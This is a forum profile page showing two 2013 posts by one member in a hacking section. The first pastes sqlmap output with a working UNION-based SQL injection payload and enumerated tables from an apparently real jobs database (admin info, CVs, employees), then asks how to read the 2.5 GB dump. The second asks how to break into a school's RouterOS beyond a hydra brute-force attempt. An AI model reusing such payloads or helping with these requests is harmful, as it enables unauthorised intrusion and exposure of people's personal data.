Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Right_

Pages: [1]
1
Hacking and Security / Better way to read ?
« on: December 26, 2013, 08:56:12 am »
Morning guys
i've found some database log , beginning od the log are look like this

Code: [Select]
sqlmap identified the following injection points with a total of 2122 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (random number) - 8 columns
    Payload: id=-2478 UNION ALL SELECT 1003, CONCAT(0x3a6661733a,0x79527352695a42655172,0x3a7a73753a), 1003, 1003, 1003, 1003, 1003, 1003#
---

available databases [2]:
[*] information_schema
[*] pak_int

Code: [Select]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (random number) - 8 columns
    Payload: id=-2478 UNION ALL SELECT 1003, CONCAT(0x3a6661733a,0x79527352695a42655172,0x3a7a73753a), 1003, 1003, 1003, 1003, 1003, 1003#
---

Database: pak_int
[49 tables]
+---------------------------+
| admininfo                 |
| articles                  |
| banner                    |
| category                  |
| city                      |
| cms                       |
| company                   |
| country                   |
| cover_letters             |
| currency                  |
| cv                        |
| cvachievements            |
| cveduhistory              |
| cvlanguages               |
| cvprojects                |
| cvrefrences               |
| cvs                       |
| cvskills                  |
| degrees                   |
| department                |
| employee                  |
| employee_network_employee

any idea how to read in a better way , because it was 2.5 gb size

thanks in advance

Staff note: lrn2codetag

2
Hacking and Security / Internet Connection Monopolied
« on: November 17, 2013, 01:40:19 pm »
Good Morning
I have a little bit confusing problem , My school has a quite fast insternet speed (Its about 8mb/s , its fast enough in my country)
Everything is okay until one month ago , the admin of my school network installing router os /Miikrotik to controll bandwith allocation in my school.
But he make almost all bandwith to his room , at least 70% of the bandwith , to download shi*tty things

My Question :

How do i break this "RouterOS" , i've trying brute forcing with hydra but it will take 20 hours or more, do you guys know something more efficient ?
i wanted to remove this bandwith allocation and make every user has the same bandwith, and it'll be fair enough


thanks in advance

Pages: [1]